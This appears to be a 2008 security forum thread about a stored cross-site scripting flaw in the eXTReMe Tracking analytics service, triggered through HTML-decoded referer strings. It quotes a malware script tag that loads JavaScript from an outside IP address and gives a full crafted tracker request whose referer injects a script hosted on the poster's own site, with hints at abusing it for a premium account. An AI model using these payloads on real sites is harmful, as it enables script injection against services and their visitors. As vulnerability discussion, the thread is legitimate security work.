Topic: "eXTReMe Tracking XSS" (page 1 of 1)

1
Author Post
quangntenemy
groupmastergroupmastergroupmastergroupmastergroupmastergroupmastergroupmastergroupmastergroupmastergroupmastergroupmastergroupmastergroupmaster
I use this one to track visitors coming to my blog.
Recently there has been an evil Chinese virus roaming around freely, and I have been blogging about it. And many people have been coming to my blog via the Google query:
<script src=http://121.15.220.104/1.js></script>

which is the signature for the virus.

Guess what? Today when I visited eXTReMe Tracking, I saw this nice ad:
linkhttp://www.flickr.com/photos/22823442@N02/2195246062/
What happened? No, neither my comp nor any other computer arround was pwned by the virus. It was the tracker site that got pwned. For some weird reason it htmldecoded the referer string, and as a result the malicious script was inserted to the page.

Now let's see if I can "forge" the referer to insert my own script to the page :)
private message EMail Website
alt3rn4tiv3
groupmastergroupmastergroupmastergroupmastergroupmastergroupmastergroupmastergroupmastergroupmastergroupmastergroupmastergroupmastergroupmaster
Haha. The ad writes "&#22909;&#28040;&#24687;", aka "good news" :D

P.S. Forum is not asian-languages compatible.
Edited by alt3rn4tiv3 on 15.01.2008 14:15:20
private message EMail Website
quangntenemy
groupmastergroupmastergroupmastergroupmastergroupmastergroupmastergroupmastergroupmastergroupmastergroupmastergroupmastergroupmastergroupmaster
I finally managed to reproduce the XSS in a "nice" way :)
First you need to request the page:
linkhttp://e1.extreme-dm.com/s10.g?login=qpenguin&jv=y&j=y&srw=1024&srb=24&l=http%3A//www.google.com/search%3Fhl%3Den%26q%3D%3Cscript+src%3Dhttp%3A//quangntenemy.t35.com/lolxss.js%3E%3C/script%3E%26btnG%3DGoogle+Search
Then wait for a few minutes and you'll see the xss here: linkhttp://extremetracking.com/open;ref1?login=qpenguin
Screenshot:
linkhttp://www.flickr.com/photos/22823442@N02/2194552167/

Now maybe I can use this to get a premium account. This type 2 XSS attack is surely the most dangerous one :)
Edited by quangntenemy on 18.01.2008 06:57:43
private message EMail Website
unknown user
jup that's pretty bad.
EMail

Topic: "eXTReMe Tracking XSS" (page 1 of 1)

1